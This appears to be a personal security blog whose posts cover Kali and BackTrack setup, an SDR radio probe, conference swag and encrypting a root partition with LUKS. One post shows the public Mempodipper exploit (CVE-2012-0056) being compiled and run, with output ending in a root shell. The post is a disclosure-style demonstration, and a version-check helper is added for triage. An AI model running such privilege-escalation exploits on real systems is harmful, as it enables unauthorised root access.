Pentesting on the Samsung Galaxy?

Are all those pentest tools running on Android? Just went to and it seems some interesting stuff is cooking there. Can't wait for August the 1st 🙂

Posted in Uncategorized | Leave a comment

Installing Virtualbox on Kali Linux

Hackers For Charity

A friend insisted I write this up; it is pretty simple. Kali 1.x is built on Debian wheezy, so the wheezy package from the VirtualBox download page is the one to use; pick the i386 or amd64 build that matches your install. The kernel headers are needed because the package builds the vboxdrv kernel module against the running kernel, so if dist-upgrade brought in a new kernel, reboot into it before installing the headers, and rebuild the module (/etc/init.d/vboxdrv setup) after every kernel upgrade.

root@kali:~# apt-get update
root@kali:~# apt-get upgrade
root@kali:~# apt-get dist-upgrade
root@kali:~# apt-get install linux-headers-$(uname -r)
root@kali:~# wget
root@kali:~# dpkg -i virtualbox-4.2_4.2.14-86644~Debian~wheezy_i386.deb

If dpkg stops on unmet dependencies, apt-get -f install pulls them in and finishes the configuration. That's all.
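A small wrapper for the last two steps, added here as an example and not part of the original post: it refuses to hand the downloaded .deb to dpkg unless its SHA-256 matches the value from the vendor's download page, and it lets apt resolve dependencies if dpkg stops. The expected hash is an argument because the post gives none; the function names are this example's own.

```sh
#!/bin/sh
# Added example, not from the original post: check the downloaded VirtualBox .deb
# against a SHA-256 taken from the vendor's download page before dpkg -i touches
# the system, and let apt pull in anything the package depends on. No hash is
# hard-coded here because the post does not give one; the caller supplies it.

# verify_deb FILE EXPECTED_SHA256
# Returns 0 when the file's SHA-256 matches, 1 on mismatch, 2 when the file is missing.
verify_deb() {
    file="$1"; expected="$2"
    [ -f "$file" ] || { echo "verify_deb: no such file: $file" >&2; return 2; }
    actual=$(sha256sum "$file" | cut -d' ' -f1)
    if [ "$actual" != "$expected" ]; then
        echo "verify_deb: checksum mismatch for $file" >&2
        echo "  expected $expected" >&2
        echo "  got      $actual" >&2
        return 1
    fi
    return 0
}

# install_deb FILE EXPECTED_SHA256
# Installs only after the checksum passes; if dpkg stops on unmet dependencies,
# `apt-get -f install` fetches them and completes the package configuration.
install_deb() {
    verify_deb "$1" "$2" || return $?
    dpkg -i "$1" || apt-get -f install -y
}

# Usage (as root on Kali):
#   install_deb virtualbox-4.2_4.2.14-86644~Debian~wheezy_i386.deb <sha256 from the download page>
```

The point of the split is that `verify_deb` can be run by an unprivileged user against the file before anything runs as root; only `install_deb` needs root.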


Into infinity I go


So a buddy of mine, comodo (ty), decided to bring one of these cool little babies to town. I can only say it is awesome. GSM (OpenBSC, hahaha), RFID, wireless, here I come.

Managed to get her to “talk to me”.

root@bt:/home/chalo/Desktop/usrp# uhd_usrp_probe
linux; GNU C++ version 4.4.3; Boost_104000; UHD_003.004.002-188-unstable

— Opening a USRP2/N-Series device…
— Current recv frame size: 1472 bytes
— Current send frame size: 1472 bytes
| Device: USRP2 / N-Series Device
| _____________________________________________________
| /
| | Mboard: N200r4
| | hardware: 2576
| | mac-addr: a0:36:fa:26:33:ed
| | ip-addr:
| | subnet:
| | gateway:
| | gpsdo: none
| | serial: EER13VDUN
| | FW Version: 12.2
| | FPGA Version: 10.0
| |
| | Time sources: none, external, _external_, mimo
| | Clock sources: internal, external, mimo
| | Sensors: mimo_locked, ref_locked
| | _____________________________________________________
| | /
| | | RX DSP: 0
| | | Freq range: -50.000 to 50.000 Mhz
| | _____________________________________________________
| | /
| | | RX DSP: 1
| | | Freq range: -50.000 to 50.000 Mhz
| | _____________________________________________________
| | /
| | | RX Dboard: A
| | | ID: WBX v3, WBX v3 + Simple GDB (0x0057)
| | | Serial: E7R1DW6XW
| | | _____________________________________________________
| | | /
| | | | RX Frontend: 0
| | | | Name: WBXv3 RX+GDB
| | | | Antennas: TX/RX, RX2, CAL
| | | | Sensors: lo_locked
| | | | Freq range: 68.750 to 2200.000 Mhz
| | | | Gain range PGA0: 0.0 to 31.5 step 0.5 dB
| | | | Connection Type: IQ
| | | | Uses LO offset: No
| | | _____________________________________________________
| | | /
| | | | RX Codec: A
| | | | Name: ads62p44
| | | | Gain range digital: 0.0 to 6.0 step 0.5 dB
| | | | Gain range fine: 0.0 to 0.5 step 0.1 dB
| | _____________________________________________________
| | /
| | | TX DSP: 0
| | | Freq range: -250.000 to 250.000 Mhz
| | _____________________________________________________
| | /
| | | TX Dboard: A
| | | ID: WBX v3 (0x0056)
| | | Serial: E7R1DW6XW
| | | ID: WBX + Simple GDB, WBX v3 + Simple GDB, WBX v4 + Simple GDB (0x004f)
| | | Serial: ECR1DV3GS
| | | _____________________________________________________
| | | /
| | | | TX Frontend: 0
| | | | Name: WBXv3 TX+GDB
| | | | Antennas: TX/RX, CAL
| | | | Sensors: lo_locked
| | | | Freq range: 68.750 to 2200.000 Mhz
| | | | Gain range PGA0: 0.0 to 31.0 step 1.0 dB
| | | | Connection Type: IQ
| | | | Uses LO offset: No
| | | _____________________________________________________
| | | /
| | | | TX Codec: A
| | | | Name: ad9777
| | | | Gain Elements: None


Cool stuff from HFC


Recently I decided to pass by my friend Johnny to see how he is doing. He always gives me some cool security gear. Thanks Johnny.

Jasager, to pwn all the wifi probes around.

HFC stickers to spread the word around. Notice the cool ShmooCon badge somewhere in there.

Try harder from Offsec. This went straight to my laptop.

Throwing Star LAN Tap. This is a cool gadget, especially for internal pentests.


Backtrack 5 kernel whoops !!


If you run BackTrack 5 R1 as a non-root user, be aware that its kernel, like apparently every Linux kernel >= 2.6.39 before the fix, can be exploited to get root through a local privilege escalation that abuses writes to /proc/pid/mem from a SUID binary (CVE-2012-0056, "Mempodipper"). Read more on zx2c4's blog; the exploit code can be obtained here.

chalo@bt:~$ uname -a
Linux bt #1 SMP Thu Aug 18 13:38:02 NZST 2011 i686 GNU/Linux
chalo@bt:~$ wget -c
chalo@bt:~$ gcc -o sploit mempodipper.c
chalo@bt:~$ ./sploit
= Mempodipper =
= by zx2c4 =
= Jan 21, 2012 =

[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/12634/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Ptracing su to find next instruction without reading binary.
[+] Resolved exit@plt to 0x8049a30.
[+] Calculating su padding.
[+] Seeking to offset 0x8049a24.
[+] Executing su with shellcode.
sh-4.1# whoami
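The first thing to know on any box is whether its kernel even falls in the affected range. The helper below is an added example, not part of the post and not from the Mempodipper author: it parses a `uname -r` string and reports whether the version lies between 2.6.39 (the lower bound the post gives) and 3.2.2, the first mainline release that shipped the fix. Distribution kernels backport fixes without bumping the version, so a hit means the box needs a closer look, not that it is exploitable.

```sh
#!/bin/sh
# Added triage helper, not from the original post or from the Mempodipper author:
# decide from a `uname -r` string whether the running kernel sits in the version
# window the post describes. The lower bound (2.6.39, where /proc/pid/mem writes
# were enabled) comes from the post; the upper bound is 3.2.2, the first mainline
# release carrying the fix. Distribution kernels backport fixes without changing
# the version, so a hit means "check this box", not "this box is exploitable".

# vercmp A B: compare two dotted version strings numerically, ignoring any
# suffix such as "-12-generic". Prints -1, 0 or 1 for A<B, A==B, A>B.
vercmp() {
    awk -v a="$1" -v b="$2" 'BEGIN {
        sub(/[^0-9.].*/, "", a); sub(/[^0-9.].*/, "", b)
        na = split(a, x, "."); nb = split(b, y, ".")
        n = (na > nb) ? na : nb
        for (i = 1; i <= n; i++) {
            p = (i <= na) ? x[i] + 0 : 0   # missing components count as 0, so 3.2 == 3.2.0
            q = (i <= nb) ? y[i] + 0 : 0
            if (p < q) { print "-1"; exit }
            if (p > q) { print "1"; exit }
        }
        print "0"
    }'
}

# in_mempodipper_window VERSION: true (exit 0) when 2.6.39 <= VERSION < 3.2.2.
in_mempodipper_window() {
    [ "$(vercmp "$1" 2.6.39)" -ge 0 ] && [ "$(vercmp "$1" 3.2.2)" -lt 0 ]
}

# check_running_kernel: report on the kernel this shell is running under.
check_running_kernel() {
    k=$(uname -r)
    if in_mempodipper_window "$k"; then
        echo "kernel $k is inside the 2.6.39 .. 3.2.1 window: confirm whether the /proc/pid/mem fix was backported"
        return 0
    fi
    echo "kernel $k is outside the affected window"
    return 1
}
```

`check_running_kernel` is what you would run on the target; `in_mempodipper_window` takes a version string so the same logic can be applied to a list of kernels collected from an inventory.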


Installing backtrack on encrypted partition with luks


Before you start, please note that this process will destroy any data on the partitions involved. Have a full backup of your system before you begin, and be sober while you are doing this. I have tested this tutorial on BackTrack 4 pre-final, BackTrack 4 final, BackTrack 5 and BackTrack 5 R1.
Note that my hard disk setup may differ from yours. I want to install BackTrack as follows:

/dev/sda1 —– /boot partition
/dev/sda2 —– / (root filesystem) partition

The root partition will be encrypted with LUKS, so that in order to boot I have to enter a passphrase. Boot with the live CD and proceed as follows, remembering to change the partition names as necessary.

Format the root partition as a LUKS container. Enter the passphrase you want to use at startup. Credits to opox90 for noting that the hash should be SHA-2 (here sha512) rather than SHA-1.

root@bt:~# cryptsetup luksFormat -c aes-xts-plain64 -s 512 -h sha512 /dev/sdXX

Open the container for mounting. Enter the passphrase you chose above.

root@bt:~# cryptsetup luksOpen /dev/sdXX root

Create an ext3 filesystem inside the container. You can use whichever Linux filesystem you are comfortable with; note that extents are an ext4 feature, so a filesystem created with -O extent will not mount as ext3. If you want extents, use mkfs.ext4 and put ext4 in fstab instead.

root@bt:~# mkfs.ext3 -j /dev/mapper/root

After this is done, run the BackTrack installer from the desktop; double-clicking its icon should do.
Select your country.
Select the keyboard layout.

Then we get to partitioning the disk. Select manual and click next.

Select the partition for /boot, for me that's /dev/sda1. Click "edit partition" and set the options. In my case I use ext3 as the file system, I choose to format the partition, and the most important bit is to set the mount point to /boot.

Select the device for the root filesystem, for me that's /dev/mapper/root (the opened LUKS container, not the raw /dev/sda2). Click "edit partition" and set the options. I use ext3, I choose to format it, and the most important bit is to set the mount point to / (the root filesystem itself, not the /root home directory).

My final setup for the install looks as below. I know, my hard disk is rather small 🙂

When you click next, you will get a warning about swap space. I personally opt not to have swap; I have enough memory to run BackTrack and a few virtual machines. If you do want swap, put it inside the encrypted container or give it its own LUKS volume, because a plain swap partition can end up holding pages of decrypted data and keys in the clear. Click "continue".

The next bit is important. Click "Advanced": this is where BackTrack will install the bootloader. I usually install the bootloader to hd0 (the MBR of the first disk), but you can install it to the Linux partition. Even if you have Windows, you can install the bootloader to hd0, and at boot you will be presented with a menu of which OS to boot.

You are now set for the install. Click install and wait for it to finish. When it is done, click "continue using the live CD".
We need to make a few changes before we leave the live CD. Mount the opened container, then the /boot partition on top of it, and the pseudo-filesystems the chroot will need:

root@bt:~# mkdir /mnt/root
root@bt:~# mount /dev/mapper/root /mnt/root/
root@bt:~# mount /dev/sdXX /mnt/root/boot
root@bt:~# mount -t proc proc /mnt/root/proc/
root@bt:~# mount -t sysfs sys /mnt/root/sys/
root@bt:~# mount -o bind /dev /mnt/root/dev/
root@bt:~# chroot /mnt/root/ /bin/bash

Using a text editor like vi or nano, edit /etc/crypttab and add the LUKS partition. The name in the first column must be root so the mapping comes up as /dev/mapper/root:

root /dev/sdXX none luks

Using a text editor like vi or nano, edit /etc/fstab. Remove any other lines you find and leave the file as below, replacing XX with your partition. Device names like /dev/sdXX can change when disks are renumbered; blkid prints the UUID of each partition, and UUID=... works in place of the device path in both files.

/dev/mapper/root / ext3 relatime,errors=remount-ro 0 1
/dev/sdXX /boot ext3 defaults 0 0

Using a text editor like vi or nano, edit the /etc/initramfs-tools/modules file and add the following modules to the end of the file


Create the new initrd image

root@bt:~# update-initramfs -k all -c

Install GRUB to your hard disk. Use the whole-disk device name, not a partition, e.g. /dev/sda

root@bt:~# grub-install /dev/sdX

root@bt:~# exit

root@bt:~# reboot

Your root filesystem is now encrypted and you will be asked for the passphrase at boot to unlock it.
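The post-install fix-up above as one script, added here as an example rather than the post's own commands. It keys crypttab and fstab by UUID instead of /dev/sdXX so a disk that enumerates differently on the next boot does not leave you without a root filesystem, and it checks that the partition really carries a LUKS header before doing anything else. It assumes the layout in the post: a LUKS partition already opened as "root" holding / on ext3, and a plain ext3 /boot partition. The function names and the device paths in the usage line are this example's own; the /boot fsck pass is set to 2 rather than the 0 above so it is checked after /.

```sh
#!/bin/sh
# Added example, not the original post's commands: the post-install fix-up from
# this tutorial as one script, keyed by UUID rather than /dev/sdXX. Assumes the
# layout in the post: a LUKS partition opened as "root" holding / on ext3, and a
# plain ext3 /boot partition. Device paths are arguments, nothing is hard-coded.
set -eu

# write_crypttab TARGET LUKS_UUID: /etc/crypttab under TARGET, mapping the LUKS
# volume to /dev/mapper/root and prompting for the passphrase at boot.
write_crypttab() {
    target="$1"; luks_uuid="$2"
    mkdir -p "$target/etc"
    printf 'root UUID=%s none luks\n' "$luks_uuid" > "$target/etc/crypttab"
}

# write_fstab TARGET BOOT_UUID: /etc/fstab under TARGET with exactly the two lines
# the post uses (no swap). /boot gets fsck pass 2 so it is checked after /.
write_fstab() {
    target="$1"; boot_uuid="$2"
    mkdir -p "$target/etc"
    {
        printf '/dev/mapper/root / ext3 relatime,errors=remount-ro 0 1\n'
        printf 'UUID=%s /boot ext3 defaults 0 2\n' "$boot_uuid"
    } > "$target/etc/fstab"
}

# fixup_installed_system LUKS_DEV BOOT_DEV DISK: run from the live CD as root after
# the installer finishes and the container is open, e.g.
#   fixup_installed_system /dev/sda2 /dev/sda1 /dev/sda
# (touches real devices; the test only exercises the two writers above).
fixup_installed_system() {
    luks_dev="$1"; boot_dev="$2"; disk="$3"
    cryptsetup isLuks "$luks_dev"              # abort unless the header really is LUKS
    luks_uuid=$(cryptsetup luksUUID "$luks_dev")
    boot_uuid=$(blkid -s UUID -o value "$boot_dev")
    mkdir -p /mnt/root
    mount /dev/mapper/root /mnt/root
    mount "$boot_dev" /mnt/root/boot
    write_crypttab /mnt/root "$luks_uuid"
    write_fstab /mnt/root "$boot_uuid"
    for d in proc sys dev; do mount --bind "/$d" "/mnt/root/$d"; done
    chroot /mnt/root update-initramfs -k all -c
    chroot /mnt/root grub-install "$disk"
    for d in dev sys proc; do umount "/mnt/root/$d"; done
    umount /mnt/root/boot
    umount /mnt/root
}
```

Because `set -e` is on, a failed `cryptsetup isLuks` (wrong partition) or a failed mount stops the script before anything is written into the installed system.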

Credits to esc201, who wrote a good tutorial on encrypting the disk with bt4-prefinal.


Swag 2.0 Beta


Went to Uganda, met Johnny; I'll let the pictures say the rest. But this beats cool on so many levels. Thanks for the wonderful time and gifts. He also gave me a coin and the badge from DEF CON, not included now because they are with a pal. Enjoy the gallery. It's an honor for me.

And Johnny is back. What do I mean? He is back to security. Watch this small space. It was a nice catch-up; we spoke of the sweetness of the PwnPhone amongst other good things. He is OK. Please remember to donate to HFC. OK, enough talk.

Look at this cool Dirty Security T-shirt. Actually I had to put it on on my way back. This just rocks.

And a BackTrack Revolution shirt from the Offsec team. Oh my...

And this Hackers for Charity DEF CON shirt to top up the collection. This made heads turn in Nairobi when I put it on.
